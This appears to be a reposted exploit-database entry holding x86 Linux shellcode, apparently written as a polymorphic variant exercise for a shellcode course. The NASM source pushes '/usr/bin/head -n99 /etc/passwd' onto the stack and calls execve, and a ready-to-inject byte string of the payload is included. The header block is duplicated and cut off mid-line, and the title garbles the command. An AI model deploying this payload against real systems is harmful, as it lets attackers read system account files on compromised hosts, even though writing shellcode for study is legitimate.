; Exploit Title: /usr/bin/head -n99 cat etc/passwd (poly shellcode-571.php)
; Date: November 29th, 2018
; Exploit Author: Nelis
; Version: 0.2
; Tested on: Ubuntu 12.10
; File ; Exploit Title: /usr/bin/head -n99 cat etc/passwd (poly shellcode-571.php)
; Date: November 29th, 2018
; Exploit Author: Nelis
; Version: 0.2
; Tested on: Ubuntu 12.10
; Filename: headpass.nasm
; SLAE-ID: 1327
; Based on: http://shell-storm.org/shellcode/files/shellcode-571.php
; Shellcode:"x29xc0x50x68x73x73x77x64x68x63x2fx70x61x68x2fx2fx65x74x89xe6x50x68x2dx6ex39x39x89xe7x50x68x68x65x61x64x68x62x69x6ex2fx68x2fx2fx2fx2fx68x2fx75x73x72x89xe3x50x57x56x53xb0x0bx89xe1xcdx80"
global _start
section .text
_start:
sub eax, eax ; changed from xor eax, eax
push eax ; put 0-term on stack
push dword 0x64777373 ; dwss
push dword 0x61702f63 ; ap/c
push dword 0x74652f2f ; te//
mov esi, esp ; save addr of stack into esi
push eax
push dword 0x39396e2d ; 99n-
mov edi, esp ; save addr of stack into edi
push eax
push dword 0x64616568 ; daeh
push dword 0x2f6e6962 ; /nib
push dword 0x2f2f2f2f ; ////
push dword 0x7273752f ; rsu/ changed from cat to head command
mov ebx,esp ; unchanged (save addr of stack into into ebx)
; mov edx, eax ; set edx to NULL / not already 0x0 / keeping it here in case you encouter issues with it
push eax ; 0-term on stack
push edi ; added for args
push esi ; added for args
push ebx ; pointer to /user////bin/head
mov al, 0xb ; set syscall execve
mov ecx,esp ; move stack pointer into ecx
int 0x80 ; make syscall
Linux x86 usr bin head -n99 cat etc passwd Shellcode
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 370